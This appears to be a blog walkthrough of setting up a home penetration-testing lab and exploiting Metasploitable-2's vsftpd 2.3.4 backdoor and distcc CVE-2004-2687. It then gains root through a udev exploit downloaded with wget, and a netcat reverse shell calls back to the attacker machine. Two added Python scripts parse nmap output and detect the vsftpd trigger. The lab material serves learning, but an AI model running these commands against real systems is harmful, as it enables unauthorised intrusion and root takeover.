Basic Penetration testing lab — 1
I am setting up a new lab for myself and thought I would document the process, so anyone who wants to do the same can use this post as a reference. I am writing this one from scratch and will add more parts as I move forward.
Preface
- Downloading all the things.
- Creating Virtual machines
- Configuring Virtual machines
- Reconnaissance
- Exploiting Common vulnerabilities — Metasploitable-2
- Credits
1. Downloading all the Things.
VMware Fusion 10 — I like the paid version of VMware Fusion 10, but you can also use VirtualBox, which is FREE. I still highly recommend VMware Fusion 10.
Parrot OS — I have been using Kali Linux for a long time; I wanted to try Parrot OS because many people recommended it.
https://metasploit.help.rapid7.com/docs/metasploitable-2
Metasploitable-2 — Metasploitable-2 is intentionally vulnerable; it is developed by Rapid7 for practicing against a vulnerable host. DO NOT expose this machine to any production or sensitive network.
2. Creating Virtual Machines.
Parrot OS
Click on “Install from disc or image”, locate your ISO and accept the default configuration; you can choose the memory and disk size according to your needs.
Provide the location of the Parrot OS ISO.
You can use “live mode” or install it. I preferred the installed version.
Metasploitable-2
The installation process is similar to Parrot OS.
You can set the memory and disk size according to your needs, but keep the host machine's resources in mind when choosing custom values.
3. Configuring Virtual Machines
For a penetration testing lab it is important that the machines can reach each other locally. To do that, select “Bridged” in each VM's network settings. Bridged mode puts the VMs on the same network as the host, so use it only on an isolated lab network, given the Metasploitable-2 warning above.
ParrotOS
Metasploitable-2
4. Reconnaissance
Start up both machines, Parrot OS and Metasploitable-2.
Metasploitable-2
Login with the following credentials.
Username: msfadmin
Password: msfadmin
Find the local IP address of Metasploitable-2 using
ifconfig
Metasploitable-2 local IP: 192.168.10.10
ParrotOS
Login with your credentials.
Default credentials for Parrot OS:
Username: user
Password: toor
Find the IP address for ParrotOS using the following command.
ifconfig
Parrot OS local IP: 192.168.10.5
Port scanning Metasploitable-2 from Parrot OS
nmap -A 192.168.10.10 -oX /home/ehsahil/Desktop/metasploit2-nmap-scan.xml
The output is in XML format; let's convert it into a more readable form.
For that we will use a utility called “xsltproc”, which transforms the nmap XML into HTML.
xsltproc /home/ehsahil/Desktop/metasploit2-nmap-scan.xml -o /home/ehsahil/Desktop/metasploit2-nmap-scan.html
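The HTML produced by xsltproc is good for reading, but when the same scan is repeated (for instance after patching the lab machine) it is handier to extract the open ports and service versions directly from the XML. The following script is an added example written for this post, not part of the original article or of nmap; it parses the `-oX` report format with the standard library and prints one row per open port. The embedded XML is a hand-constructed, abbreviated report that mirrors the lab hosts and services described on this page, not a real scan capture, and the function names are my own.

```python
"""Summarise an nmap -oX report: host, open port, service, product, version."""
import xml.etree.ElementTree as ET

# Constructed, abbreviated sample of the XML that `nmap -sV -oX` writes.
# Hosts, ports and versions mirror the lab on the page; the XML itself is
# hand-written for this example and is not a real scan capture.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sV 192.168.10.10" start="0">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="3632">
        <state state="open" reason="syn-ack"/>
        <service name="distccd" product="distccd" version="v1" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="8787">
        <state state="closed" reason="reset"/>
        <service name="unknown" method="table" conf="3"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per OPEN port across every host in the report.

    Closed/filtered ports are skipped; missing <service> attributes become "".
    """
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            findings.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": get("name"),
                "product": get("product"),
                "version": get("version"),
            })
    return findings


def parse_nmap_file(path):
    """Convenience wrapper: parse a report saved with `nmap -oX <path>`."""
    with open(path, encoding="utf-8") as fh:
        return parse_nmap_xml(fh.read())


def render_table(findings):
    """Render the findings as a fixed-width text table (header + one row per port)."""
    lines = ["HOST            PORT/PROTO  SERVICE   PRODUCT   VERSION"]
    for f in findings:
        lines.append(
            f"{f['host']:<15} {f['port']:>4}/{f['proto']:<6} "
            f"{f['service']:<9} {f['product']:<9} {f['version']}"
        )
    return "\n".join(lines)


if __name__ == "__main__":
    # Replace SAMPLE_NMAP_XML with parse_nmap_file("/path/to/scan.xml") for a real report.
    print(render_table(parse_nmap_xml(SAMPLE_NMAP_XML)))
```

Keeping the parsed rows rather than the HTML makes it easy to diff two scans of the same host and see which service versions changed.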
5. Exploiting Common Vulnerabilities.
Metasploitable-2
1. Exploiting vsftpd 2.3.4
2. Exploiting distcc v1 — CVE-2004-2687
1. Exploiting vsftpd 2.3.4.
Aim: Exploit the vsftpd daemon and obtain root access.
Scanning port 21 using nmap.
nmap -sV -p 21 192.168.10.10
Port 21 is open and running vsftpd 2.3.4.
Searching online for a publicly available exploit for this particular version.
vsftp 2.3.4 exploits
Exploiting manually.
ftp 192.168.10.10
Username: ehsahil:)
Password: nothing, just press Enter.
PS: the smiley :) at the end of the username is important; it is what triggers the backdoor.
Now we need to connect to port 6200, because the backdoor has opened a listener on port 6200.
nc -vvn 192.168.10.10 6200
Exploiting using Metasploit.
Start Metasploit with the msfconsole command.
msfconsole
Metasploit commands.
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.10.10
exploit
Background: this specific version of vsftpd was infected with a backdoor by an intruder. The developers quickly responded by removing the backdoor from the code, but users who had upgraded to this version were vulnerable to the issue.
The backdoor is triggered when someone puts :) (a smiley face) in the username during the FTP login handshake; the backdoor then sets up a bind shell listening on port 6200.
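The two facts in that background (the ":)" in the USER command and the listener on port 6200) are exactly what a defender would alert on. Below is an added detection example written for this post, not code from the original article or from vsftpd: it scans a list of FTP control-channel commands for USER arguments carrying the trigger sequence and raises the severity when the same source later connects to TCP 6200. The command list and connection records are hand-constructed for the example (not a real capture), and the function names are my own.

```python
"""Detection logic for the vsftpd 2.3.4 backdoor trigger.

Indicator 1: an FTP USER command whose argument contains the ":)" sequence.
Indicator 2: a follow-up connection from the same source to TCP 6200, the
port on which the backdoor's bind shell listens.
"""
import re

BACKDOOR_PORT = 6200
USER_CMD_RE = re.compile(r"^USER\s+(?P<name>.+?)\s*$", re.IGNORECASE)

# Constructed sample of client->server FTP control-channel commands, as they
# might be reconstructed from a capture or proxy log: (source IP, command).
# Hand-made for this example, not a real capture.
SAMPLE_FTP_COMMANDS = [
    ("192.168.10.5", "USER msfadmin"),
    ("192.168.10.5", "PASS msfadmin"),
    ("192.168.10.5", "USER ehsahil:)"),
    ("192.168.10.5", "PASS "),
    ("192.168.10.7", "USER anonymous"),
    ("192.168.10.7", "PASS guest@example"),
    ("192.168.10.7", "USER smiley:)"),
]

# Constructed connection records (source IP, destination IP, destination port),
# e.g. from a firewall or NetFlow log. Also hand-made for this example.
SAMPLE_CONNECTIONS = [
    ("192.168.10.5", "192.168.10.10", 21),
    ("192.168.10.5", "192.168.10.10", 6200),
    ("192.168.10.7", "192.168.10.10", 21),
]


def find_trigger_attempts(commands):
    """Return one alert (medium severity) per USER command containing ':)'."""
    alerts = []
    for src, line in commands:
        m = USER_CMD_RE.match(line)
        if m and ":)" in m.group("name"):
            alerts.append({
                "src": src,
                "username": m.group("name"),
                "rule": "vsftpd_234_backdoor_trigger",
                "severity": "medium",
            })
    return alerts


def correlate_with_connections(alerts, connections):
    """Raise an alert to high severity when its source also reached port 6200."""
    reached_backdoor_port = {src for src, _dst, dport in connections if dport == BACKDOOR_PORT}
    for alert in alerts:
        if alert["src"] in reached_backdoor_port:
            alert["severity"] = "high"
            alert["note"] = f"follow-up connection to tcp/{BACKDOOR_PORT} seen"
    return alerts


def analyse(commands, connections):
    """Run both indicators and return the correlated alert list."""
    return correlate_with_connections(find_trigger_attempts(commands), connections)


if __name__ == "__main__":
    for alert in analyse(SAMPLE_FTP_COMMANDS, SAMPLE_CONNECTIONS):
        print(alert)
```

A single ":)" login attempt is only a medium signal (it may be a scanner probing every FTP server), whereas a trigger followed by a connection to 6200 from the same source is a strong sign the backdoor was actually reached.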
Vulnerable Source code: http://pastebin.com/AetT9sS5
Detailed Source code review:
2. Exploiting vulnerable distcc — CVE-2004-2687
Aim: Getting root access on the machine.
distcc v1 is a known vulnerable application running on Metasploitable-2, but it is interesting because we have to escalate from a normal user to root using privilege escalation.
Searching online for distcc.
distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.
distcc runs on port 3632.
Running nmap against port 3632
nmap -sV -p 3632 192.168.10.10
Searching for a public exploit for distccd v1
Vulnerable to: CVE-2004-2687
Exploit publicly available: https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
Exploiting using Metasploit
msfconsole
Metasploit commands.
search distcc
use exploit/unix/misc/distcc_exec
show options
set RHOST 192.168.10.10
exploit
Currently uid=1 and we cannot cat /etc/shadow, which indicates that we don't have root privileges yet.
We need to leverage another vulnerability in the installed components.
To find one, we apply the recon process to learn more about the system.
Seeing all the shells available to us.
cat /etc/shells
GCC — used for compiling exploits
which gcc
wget — used to download the exploit onto the vulnerable machine
which wget
Let's see all the running processes.
ps aux
From the above processes we could move on to look for publicly available exploits,
but, as we are using Metasploitable-2, we already know the vulnerable component, so we will use that.
The vulnerable component is “udev”; let's grep for it in the running processes.
Searching for exploits with searchsploit
searchsploit udev
We are interested in the exploit “Local Privilege Escalation (2) — /exploits/linux/local/8572.c”
cat /usr/share/exploitdb/exploits/linux/local/8572.c
Exploit usage.
Steps for escalating from daemon to root.
1. Starting the local Apache server (apache2)
service apache2 start
2. Copying the exploit into the Apache server's public directory
Exploit directory — /usr/share/exploitdb/exploits/linux/local/
Apache servers public directory: /var/www/html
sudo cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/ehsahil.c
3. Downloading the exploit file onto the vulnerable machine using wget.
Parrot OS IP: 192.168.10.5
wget 192.168.10.5/ehsahil.c
Our exploit code “ehsahil.c” has been copied to the /tmp directory.
4. Creating a run file in the /tmp directory (required by the exploit)
touch run   # creates the run file required by the exploit; it is a shell script that spawns the reverse shell
echo '#!/bin/sh' > run
echo '/bin/netcat -e /bin/bash 192.168.10.5 5555' >> run
5. Compiling our exploit code.
gcc ehsahil.c -o ehsahil
6. Listening on port 5555
nc -lvnp 5555
7. PID of the udev netlink socket
cat /proc/net/netlink
PID of the udev netlink socket = 2718
8. Giving the compiled exploit executable permission.
chmod 755 ehsahil
9. Exploit.
./ehsahil <udev-netlink-socket-PID>
./ehsahil 2718
Reverse shell obtained.
I will post more Metasploitable-2 common exploits as I practice them.
Credits
RWB NetSec
Feedback? Hit me up on Twitter @ehsahil
Until Next time.